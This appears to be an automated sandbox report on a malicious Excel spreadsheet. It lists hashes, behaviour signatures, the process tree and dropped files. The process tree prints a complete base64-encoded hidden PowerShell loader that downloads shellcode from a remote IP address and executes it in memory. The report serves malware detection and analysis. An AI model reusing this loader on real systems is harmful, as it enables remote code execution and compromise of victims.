Analysis

  • max time kernel
    18s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-11-2024 22:03

General

  • Target

    2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db.xls

  • Size

    46KB

  • MD5

    836c57d347726357d1e67ec4fee4960c

  • SHA1

    79b73aa267a84dcf5fe8cb9b7aad481428f4f5fe

  • SHA256

    2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db

  • SHA512

    edb98a134333a83be3ed49367ad2ea4e5d31c419e5b45840ffa2b804b9c7f2dfd9712ea98fd83831b253b6363f92f77fda7a740bff3aea3d68d1ddb01968b2ef

  • SSDEEP

    768:H4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHI
AdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2180
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\epniryue.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DEE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8DED.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2900

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES8DEE.tmp

    Filesize

    1KB

    MD5

    b8ae2cdb93e246788f1ae79138ba7a83

    SHA1

    aeadef973acc26e779b103b047d5ff6fd81e35ca

    SHA256

    35cbd7777c718bee1a8a6989160b09b5a3656f6e346dd27f621081cf346dd8a1

    SHA512

    3514bdb0ef725bcf3de249447beb28b9218978fb85dfb5c91bf2d0f85ec9031e53d56bc17cd07692399eb2f6b69d516956b0a6f114823f871c29d9431845cdf0

  • C:\Users\Admin\AppData\Local\Temp\epniryue.dll

    Filesize

    3KB

    MD5

    bf37533dcde5a450c9c446369263ce00

    SHA1

    45d2c43c7288704ae5e5dc26b663905cd3b4eec5

    SHA256

    da9db8eae658f3ff6d082ca74ed0805110a71f00b58d235e19c2f63f25e9a765

    SHA512

    de3fae90b7667b575b397ad896fafd40a2788f765de10acaeb009869771510e1e46041a0cf1c18c3b0e7845643f195bac548559ac11c178aa719e716cbc9fe47

  • C:\Users\Admin\AppData\Local\Temp\epniryue.pdb

    Filesize

    7KB

    MD5

    7e94142a8954161750ade8270e9dc08d

    SHA1

    c1d373709b2e3229631fd748dce48c23847a92e4

    SHA256

    c22c33275546729cff5e0a196c707b6fc632cf078686d36fd51f1d14ebba81b2

    SHA512

    7cabd6fcb1dca5debebfc1aea4802c562e2f6b7c8ca327b928b0bf505cb21a32db714af5747d2853dd07ec67f377b5b1aa0879e7b31462d8369ace2a84d71c0a

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8DED.tmp

    Filesize

    652B

    MD5

    848b062a90a31c3dbfe9873f6bbca1c4

    SHA1

    8877d3f861250338bc5073cda2373f2e6a6897e5

    SHA256

    f6d22a1c3460e18d594609f8a746943ff5a02605a1ac1ae5d71c0ed7dae6d310

    SHA512

    b5164482999ecdbf3cf5882423b21408ef9c574c1456721ad1f972424e28e04419b031b74097dca7ea99b999e8e6974b7f1aabcf8ca92b35ff46b3e1bffd451f

  • \??\c:\Users\Admin\AppData\Local\Temp\epniryue.0.cs

    Filesize

    631B

    MD5

    f4dd5c682eb7b3b679f084261bfc7c4c

    SHA1

    70f75d7a4e42c185eb09139ed3c6f7338a2219c2

    SHA256

    2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

    SHA512

    8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\epniryue.cmdline

    Filesize

    309B

    MD5

    dfeb717e9130135f3fc329b25d7aed56

    SHA1

    478471f2f89a9e695ebb91945934c17f85a75d1c

    SHA256

    031da5768e1ed6be3f7360fb61fd650efc29c75ef9d052a2c98aebf257ac0da1

    SHA512

    dcef60a69a2289ab72be2880655bf2161b5ccec4d9aade2603166b4a67aa45aa4444460d0bfeedd540a57c2465d02075eca0562d4276f3e397752420bd400eba

  • memory/1964-8-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-7-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-1-0x0000000071DBD000-0x0000000071DC8000-memory.dmp

    Filesize

    44KB

  • memory/1964-4-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-5-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-3-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-2-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1964-27-0x0000000071DBD000-0x0000000071DC8000-memory.dmp

    Filesize

    44KB

  • memory/1964-28-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-29-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB